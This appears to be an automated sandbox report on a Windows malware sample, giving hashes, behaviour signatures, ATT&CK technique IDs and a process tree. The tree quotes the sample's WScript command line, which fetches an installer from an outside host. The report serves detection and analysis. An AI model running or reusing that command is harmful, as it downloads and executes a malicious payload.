ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795

Analysis

max time kernel
213s
max time network
229s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
07/11/2022, 08:44

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe
Size

184KB
MD5

33a5c9ede38eb3c3a775ba24f18df3de
SHA1

2d35195af0d3143cd26706e6264d8b037f11a9a3
SHA256

ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795
SHA512

3970e5039e43f32517c3ab3baa977a7c2bb620fcee85b4daff90f82158a5b36186049ba663e68788c281353867a4fa97c0005fbc9aeb649305b76943976b6379
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3A:/7BSH8zUB+nGESaaRvoB7FJNndnJ

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
20	1088	WScript.exe
28	1088	WScript.exe
35	4936	WScript.exe
38	4936	WScript.exe
43	4936	WScript.exe
51	3432	WScript.exe
52	3432	WScript.exe
55	3432	WScript.exe
56	3432	WScript.exe
57	3432	WScript.exe
58	696	WScript.exe
59	696	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	51	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	58	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4336 wrote to memory of 1088	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	79
PID 4336 wrote to memory of 1088	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	79
PID 4336 wrote to memory of 1088	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	79
PID 4336 wrote to memory of 4936	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	80
PID 4336 wrote to memory of 4936	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	80
PID 4336 wrote to memory of 4936	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	80
PID 4336 wrote to memory of 3432	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	82
PID 4336 wrote to memory of 3432	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	82
PID 4336 wrote to memory of 3432	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	82
PID 4336 wrote to memory of 696	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	83
PID 4336 wrote to memory of 696	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	83
PID 4336 wrote to memory of 696	4336	ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe	83

C:\Users\Admin\AppData\Local\Temp\ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe
"C:\Users\Admin\AppData\Local\Temp\ab8b8a50b38cf7345e55dddf882511504fcc44ebabe2aa671708cc4b8b4e1795.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4336
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCEAA.js" http://www.djapp.info/?domain=ZVRKrqfoBu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCEAA.exe
  2⤵
  - Blocklisted process makes network request
  PID:1088
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCEAA.js" http://www.djapp.info/?domain=ZVRKrqfoBu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCEAA.exe
  2⤵
  - Blocklisted process makes network request
  PID:4936
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCEAA.js" http://www.djapp.info/?domain=ZVRKrqfoBu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCEAA.exe
  2⤵
  - Blocklisted process makes network request
  PID:3432
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCEAA.js" http://www.djapp.info/?domain=ZVRKrqfoBu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCEAA.exe
  2⤵
  - Blocklisted process makes network request
  PID:696

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fufCEAA.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit